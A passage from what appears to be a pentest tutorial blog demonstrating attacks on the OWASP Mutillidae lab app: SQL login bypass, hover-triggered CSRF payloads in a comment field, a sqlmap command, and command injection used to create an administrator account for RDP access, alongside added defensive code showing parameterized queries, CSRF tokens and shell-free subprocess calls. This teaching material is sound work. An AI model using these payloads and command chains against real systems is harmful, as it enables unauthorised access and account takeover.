<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6RA7wMJwqkGdMv_QC4lnQMcA7Um3eMPmQsyzdw4ouO3QjhSMw9KmezGhhZBVglJ-CN7FOLpsPJXx1I9la34wo-T17fG9KUOiF94yaAWIHowgNP_vVUkwNVOF2WZ1nuN_7gxzSltAmLEY/s1600/sql-5-1024x131.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6RA7wMJwqkGdMv_QC4lnQMcA7Um3eMPmQsyzdw4ouO3QjhSMw9KmezGhhZBVglJ-CN7FOLpsPJXx1I9la34wo-T17fG9KUOiF94yaAWIHowgNP_vVUkwNVOF2WZ1nuN_7gxzSltAmLEY/s1600/sql-5-1024x131.png" height="50" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
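<div>
The login bypass above works because the form values are pasted into the SQL text. The following is an added example, not code from the original post or from Mutillidae: it rebuilds the page's <b>uyeler</b> table in an in-memory SQLite database (an assumption; the rows and passwords are constructed sample data) and runs the page's input against a concatenated query and a parameterized one.</div>

```python
import sqlite3


def make_db():
    """In-memory stand-in for the page's `uyeler` table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE uyeler (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Plaintext passwords mirror the lab setup only; a real table stores hashes.
    db.executemany(
        "INSERT INTO uyeler (uid, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "S3cret-admin"), (2, "www", "www-pass")],
    )
    return db


def login_vulnerable(db, username, password):
    """The flawed pattern: user input becomes part of the SQL statement text."""
    query = (
        "SELECT uid, username FROM uyeler "
        "WHERE username='" + username + "' AND password='" + password + "'"
    )
    return db.execute(query).fetchone()


def login_parameterized(db, username, password):
    """Hardened form: fixed SQL text, values bound as data by the driver."""
    query = "SELECT uid, username FROM uyeler WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone()


def compare(db, username, password):
    """Run both handlers on the same input; SQL errors are reported, not raised."""
    result = {}
    for name, handler in (
        ("vulnerable", login_vulnerable),
        ("parameterized", login_parameterized),
    ):
        try:
            result[name] = handler(db, username, password)
        except sqlite3.Error as exc:
            # A syntax error triggered by a lone quote is a classic sign that
            # input reaches the SQL parser; worth alerting on in server logs.
            result[name] = "SQL error: " + str(exc)
    return result


if __name__ == "__main__":
    db = make_db()
    cases = [
        ("www", "www-pass"),        # legitimate login
        ("www", "' or '1'='1"),     # the input used on this page
        ("www", "'"),               # a lone quote breaks the concatenated query
    ]
    for username, password in cases:
        print(repr(username), repr(password), "->", compare(db, username, password))
```

With the parameterized handler the quote characters are compared as part of the password value, so the page's input matches no row.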
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-30098048751638269652014-09-30T09:31:00.000+03:002014-10-24T14:33:50.821+03:00Performing a CSRF Attack on a Comment Field<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
In web applications, comment fields must be exposed to users with great care. If the inputs and outputs of these fields are processed without validation, the application can be exposed to dangerous attacks. A typical example is a comment field that is offered to users with HTML support. CSRF and XSS attacks are very easy to carry out against HTML-enabled fields.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
In this article we will try a few different CSRF attacks.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
The first is an attack that adds a record via CSRF when the mouse hovers over a particular area.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
We will carry this out on the OWASP Mutillidae application.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Malicious Code</strong></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><br /></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><form id="f" action="index.php?page=add-to-your-blog.php" method="post" enctype="application/x-www-form-urlencoded"></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code> <input type="hidden" name="csrf-token" value="best-guess"/></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code> <input type="hidden" name="blog_entry" value="Add this guy to the Wall of Sheep"/></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code> <input type="hidden" name="add-to-your-blog-php-submit-button" value="TESTING"/></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code></form></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><i onmouseover="window.document.getElementById(\'f\').submit()">Dancing with the stars results</code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code></i></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Let's test this code in the application.<br />
<br />
<a name='more'></a><br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCuMeKHjeCnYSixtewQzfvycCI398yRXRo3Bum2x7nvwylAuyiVWZb0EjANOvZ0yl25kbHRA60n24OGMmIG8ekAXoX9-zc9zElAUNoyYMIB6Az7C-2mXrpq2463ERukLKqzdPP-jRwFdA/s1600/c1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCuMeKHjeCnYSixtewQzfvycCI398yRXRo3Bum2x7nvwylAuyiVWZb0EjANOvZ0yl25kbHRA60n24OGMmIG8ekAXoX9-zc9zElAUNoyYMIB6Az7C-2mXrpq2463ERukLKqzdPP-jRwFdA/s1600/c1.png" height="172" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
In our second example, again when the mouseover event is triggered, the session is dropped and the user is logged out.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Malicious Code:</strong></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><i onmouseover="window.document.location=\'http://localhost/mutillidae/index.php?do=logout\'"></code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code>How to improve your Facebook status</code></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code></i> </code></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbECnsutfsulIdEFvEgXT2dcsT18km2ZUdRQHO0nmULIAmaE2kquv68irxi-KoSPKOyQ5W0ZhZtuX48goqknA5BTpBpaI5dYx9bKpXCy638GjrzfrqWyWx3t6PThcx4f7pxbkFNGf_Jrc/s1600/c2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbECnsutfsulIdEFvEgXT2dcsT18km2ZUdRQHO0nmULIAmaE2kquv68irxi-KoSPKOyQ5W0ZhZtuX48goqknA5BTpBpaI5dYx9bKpXCy638GjrzfrqWyWx3t6PThcx4f7pxbkFNGf_Jrc/s1600/c2.png" height="275" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">In the third example, JavaScript code adds a row and the page reloads; a row is added every time the page reloads. Like a kind of DoS attack, this renders the page unusable.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaZkqdlaqhBZyHSpLxwU2pTAx146VG81AQmADVuybuJPRfDkXCcgqB-pdSZcdk73OrtzfDXNM7ySgX6_vMgKcCnxvt8aYrfHXTVVJhcWuwSvWabNJPPiQGnwElmloVSUIDKsbg4_utKLY/s1600/c4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaZkqdlaqhBZyHSpLxwU2pTAx146VG81AQmADVuybuJPRfDkXCcgqB-pdSZcdk73OrtzfDXNM7ySgX6_vMgKcCnxvt8aYrfHXTVVJhcWuwSvWabNJPPiQGnwElmloVSUIDKsbg4_utKLY/s1600/c4.png" height="218" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">As we have seen, comments accepted through comment fields led to serious vulnerabilities. For this reason, the inputs and outputs of comment fields must always be validated.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<code><br /></code></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
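<div>
The input and output checks called for above, as an added example that is not part of the original post and is not Mutillidae code: a hypothetical <b>BlogApp</b> handler that compares the submitted <b>csrf-token</b> field with a per-session random token, refuses state changes over GET, and HTML-encodes stored comments when rendering. The class, its method names and the sample comment constant are assumptions made for the illustration.</div>

```python
import hmac
import html
import secrets

# Constructed sample input modelled on the hover comment shown in the post.
HOVER_COMMENT = (
    "<i onmouseover=\"document.getElementById('f').submit()\">"
    "Dancing with the stars results</i>"
)


class BlogApp:
    """Minimal stand-in for a comment form handler (hypothetical)."""

    def __init__(self):
        self.csrf_tokens = {}  # session id -> token embedded in the served form
        self.entries = []      # comments are stored exactly as submitted

    def login(self):
        """Create a session and issue an unguessable per-session CSRF token."""
        sid = secrets.token_hex(16)
        self.csrf_tokens[sid] = secrets.token_urlsafe(32)
        return sid

    def form_token(self, sid):
        """Token the server would place in the hidden csrf-token field."""
        return self.csrf_tokens[sid]

    def _token_ok(self, sid, form):
        expected = self.csrf_tokens.get(sid)
        supplied = form.get("csrf-token", "")
        if expected is None:
            return False
        # Constant-time comparison; bytes so non-ASCII input cannot raise.
        return hmac.compare_digest(expected.encode(), supplied.encode())

    def add_entry(self, sid, form):
        """Input check: reject any POST whose token does not match the session."""
        if not self._token_ok(sid, form):
            return 403
        self.entries.append(form.get("blog_entry", ""))
        return 200

    def logout(self, sid, method, form):
        """State-changing, so POST plus token only; a GET navigation is refused."""
        if method != "POST" or not self._token_ok(sid, form):
            return 403
        del self.csrf_tokens[sid]
        return 200

    def render(self):
        """Output check: encode on output so stored markup is shown as text."""
        return "\n".join(
            "<li>" + html.escape(entry, quote=True) + "</li>"
            for entry in self.entries
        )


if __name__ == "__main__":
    app = BlogApp()
    sid = app.login()
    forged = {"csrf-token": "best-guess", "blog_entry": "forged entry"}
    print("forged POST:", app.add_entry(sid, forged))
    genuine = {"csrf-token": app.form_token(sid), "blog_entry": HOVER_COMMENT}
    print("genuine POST:", app.add_entry(sid, genuine))
    print(app.render())
    print("logout via GET:", app.logout(sid, "GET", {}))
```

Both controls are needed together: a token stops forged submissions, but markup that is rendered unencoded runs in the page's own origin and can read the token from the form.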
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-87524887653625807222014-09-30T09:21:00.002+03:002014-10-24T14:33:35.600+03:00Learning Database Information with sqlmap<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;">sqlmap is a tool that finds SQL injection vulnerabilities in web applications.</span></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;">Let's use sqlmap to learn database information. For this we will use the</span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;"> </span><span style="border: 0px; color: maroon; font-family: Arial, Helvetica, sans-serif; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-style: inherit; font-variant: inherit; font-weight: 600; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">--banner</span></span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;"> </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 28.7999992370605px;">parameter.</span></span></div>
<div style="border: 0px; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="background-color: #eeeeee;"><span style="color: #666666;">-></span><span style="color: red;">#<span style="border: 0px; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">sqlmap --url "http://fbhportal.com/mutillidae/index.php?page=login.php" --banner</span></span></b></span></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;">Let's run the query with the command above.</span></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;">This takes a while, but let's look at the result.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqLLQlarSWKBNMjYdddTHR04-o5esdaU8tpyX5aSSuqe77hS1SAtGxPD-P_xymZUB57fcGCWlx-SFoHEA-5d4MVfrPLNPiSbMbwengiQERQAdJrGLtn1XcAdg8Bluw4r6tYTXEaxkT-Y/s1600/sql11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixqLLQlarSWKBNMjYdddTHR04-o5esdaU8tpyX5aSSuqe77hS1SAtGxPD-P_xymZUB57fcGCWlx-SFoHEA-5d4MVfrPLNPiSbMbwengiQERQAdJrGLtn1XcAdg8Bluw4r6tYTXEaxkT-Y/s1600/sql11.png" height="347" width="400" /></a></div>
<div style="border: 0px; color: #666666; line-height: 28.7999992370605px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-91469192050164822052014-09-25T12:20:00.000+03:002014-10-24T14:33:21.957+03:00Breaking into a Computer through a Command Injection Vulnerability<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Command Injection</strong> is a vulnerability that allows system commands to be run on the host's command line through input fields that web applications typically use for operations such as ping and DNS lookups. On sites hosted on either Windows or Linux systems, this vulnerability makes it very easy to break into the system.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Let's demonstrate this with an example on OWASP. If a site installed on an XP computer with the firewall turned off has a Command Injection vulnerability, how can we get into the computer?</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWll1GNJOYyXJDne8Evpz0wEgRAFCGFvtkGwoG_SeKFZf4u5zHe8bDjvkJxq5mvWlmeAlcHQ9nWPIKEcQbrlQ4i_DSpcj5i2K-qzpAGkNBxNHZbt5jiTENcCcAWvPZjsW5ktm8GxUnopo/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWll1GNJOYyXJDne8Evpz0wEgRAFCGFvtkGwoG_SeKFZf4u5zHe8bDjvkJxq5mvWlmeAlcHQ9nWPIKEcQbrlQ4i_DSpcj5i2K-qzpAGkNBxNHZbt5jiTENcCcAWvPZjsW5ktm8GxUnopo/s1600/1.png" height="187" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a name='more'></a><br /><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
When we send a ping from the input field that the site normally uses for DNS lookups, we get the result above. So the application executes what we type and prints the result to the screen.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
To decide whether the system is Linux or Windows, we type the <b>"uname -a"</b> command, or we run an operating system scan with <b>nmap</b> and decide from the result whether it is Linux or Windows.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
If it is <b>Windows</b>, we can list the current directory with the "<b>&& dir</b>" command.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfB60EheLEMaNr5mN6cRFLPjaidMNdzgqgeHne7aPhSinZO9hR9zHNlV7nOf3MNJzy2RdXpta6O_IH7v1fg3qwF2duhKr7K3bg2LCQ8CoOHZt38KsfWx58OoZLm__zw_o88xh7pAmRTu0/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfB60EheLEMaNr5mN6cRFLPjaidMNdzgqgeHne7aPhSinZO9hR9zHNlV7nOf3MNJzy2RdXpta6O_IH7v1fg3qwF2duhKr7K3bg2LCQ8CoOHZt38KsfWx58OoZLm__zw_o88xh7pAmRTu0/s1600/2.png" height="196" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Let's proceed on the assumption that the site is installed on a Windows system. To have the commands we type processed (several commands one after another), <b>" && "</b> is used on Windows systems, while <b>" ; "</b> is used on Linux systems.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Step 1: Let's create a user on the Windows system... <b>"net users test test /add"</b></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q4Fp6ddTMbwdyzLDuUGpP7-ZS7rywBWHUoUM6WgofGP0bvG8BFpfjwgtx36PgIGs_SLbLcAz1686V8BJgSCmDnAnV93OHLVjAnsISeAuVJt9nUemR2SHfBgIUsga5DE2UwNBgffSPl8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Q4Fp6ddTMbwdyzLDuUGpP7-ZS7rywBWHUoUM6WgofGP0bvG8BFpfjwgtx36PgIGs_SLbLcAz1686V8BJgSCmDnAnV93OHLVjAnsISeAuVJt9nUemR2SHfBgIUsga5DE2UwNBgffSPl8/s1600/3.png" height="177" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<b><br /></b></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
As the image shows, the command completed successfully.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Step 2: Let's grant privileges to the user we created by adding it to the <i>Administrators</i> group. We can also add it to the <i>domain group</i> or the <i>Remote Desktop User</i> group. We will try whichever one lets us into the system.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7Dsq52tAPWrMUhF7ByceQp8cQPkJmYLgWW_mEMcOdR9nI5SekiwFuqhjotEuzpiddEqcpWkWlen7Ojy5MUQbPmQPmXDiJVr2ULUs-T4K2gUCjeFclfijog37PY9OPACCsvxDpOmAaYA/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjd7Dsq52tAPWrMUhF7ByceQp8cQPkJmYLgWW_mEMcOdR9nI5SekiwFuqhjotEuzpiddEqcpWkWlen7Ojy5MUQbPmQPmXDiJVr2ULUs-T4K2gUCjeFclfijog37PY9OPACCsvxDpOmAaYA/s1600/5.png" height="180" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Our user now has administrator privileges. Let's connect to the system over RDP with this user.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
The IP address of the host running the site is 192.168.0.36.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Username: test</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Password: test</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ42eCvapu3Pj7_xaxkWQhoKsajXVAgO8PoeuluTncOWlv7cSUsrng9z3361CjZV3Bw0s4WnmdrSMRmuMQKkr2cBq_91cBDbtu9x3RoAYLp0U4HcqsKNrXANo8Cp4CSFUe8VXRDXdczt4/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ42eCvapu3Pj7_xaxkWQhoKsajXVAgO8PoeuluTncOWlv7cSUsrng9z3361CjZV3Bw0s4WnmdrSMRmuMQKkr2cBq_91cBDbtu9x3RoAYLp0U4HcqsKNrXANo8Cp4CSFUe8VXRDXdczt4/s1600/4.png" height="207" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">As the image above shows, the "test" user we created has been added.</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj969Bekk2dw3Xz8aEdBDUyE4EeHCRtw2zIo97zDnTWHn069BuLBoTLFNn_k_H8iGLy8J9UXEdd-S53xnpB5PwXSSznjt3dsraq0pCRh1zrdRZ6gYdlVyeGOJ5S_OfXGgvfYi-XWUJaa-0/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj969Bekk2dw3Xz8aEdBDUyE4EeHCRtw2zIo97zDnTWHn069BuLBoTLFNn_k_H8iGLy8J9UXEdd-S53xnpB5PwXSSznjt3dsraq0pCRh1zrdRZ6gYdlVyeGOJ5S_OfXGgvfYi-XWUJaa-0/s1600/6.png" height="337" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
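<div>
The root cause of the walkthrough above is a handler that concatenates the form value into a shell command line. The following is an added example, not code from the original post or from the vulnerable application: it contrasts that pattern with an argument-vector call and with hostname validation. It assumes a POSIX system, uses <b>echo</b> as an offline stand-in for the DNS lookup tool, and the function names and the harmless <b>echo INJECTED</b> marker are constructed for the illustration.</div>

```python
import re
import subprocess

# One DNS label: letters, digits and inner hyphens, 1 to 63 characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def lookup_vulnerable(host):
    """Flawed pattern: the value is concatenated into a string the shell parses."""
    cmd = "echo lookup " + host  # `echo` stands in for the real lookup tool
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


def lookup_argv(host):
    """No shell: the value is one argv element, so separators are literal text."""
    done = subprocess.run(
        ["echo", "lookup", host], capture_output=True, text=True
    )
    return done.stdout.splitlines()


def lookup_validated(host):
    """Allow-list the value first, then run without a shell."""
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        # Rejections are worth logging: separators in a hostname field
        # are a strong signal of probing.
        raise ValueError("rejected host value: %r" % host)
    return lookup_argv(host)


def demo():
    """Run the three handlers on a normal value and on separator-bearing values."""
    samples = [
        "example.com",
        "example.com && echo INJECTED",  # separator the post names for Windows
        "example.com; echo INJECTED",    # separator the post names for Linux
    ]
    rows = []
    for value in samples:
        try:
            validated = lookup_validated(value)
        except ValueError as exc:
            validated = str(exc)
        rows.append((value, lookup_vulnerable(value), lookup_argv(value), validated))
    return rows


if __name__ == "__main__":
    for value, vulnerable, argv, validated in demo():
        print("input     :", repr(value))
        print("  shell   :", vulnerable)
        print("  argv    :", argv)
        print("  checked :", validated)
```

The validation pattern also rejects values that begin with a hyphen, which the lookup tool could otherwise read as an option.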
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-72506716076475488722014-09-23T09:47:00.001+03:002015-01-20T22:23:40.839+02:00What Is Wireshark and How Is It Used?<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Wireshark is a program that can analyze all TCP/IP messages on every kind of network card attached to the computer (Ethernet cards or modem cards). <span id="more-2252"></span>Today Wireshark is used for many purposes: troubleshooting network problems, testing for security problems, debugging errors in protocol implementations, and learning the information carried inside network protocols.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span data-mce-style="text-decoration: underline;" style="text-decoration: underline;"><strong>Wireshark Features</strong></span></div>
<ul style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>It runs on Unix and Windows operating systems.</li>
<li>It captures packets from the local network interface and displays them in detail with their protocol information.</li>
<li>It can save captured packets.</li>
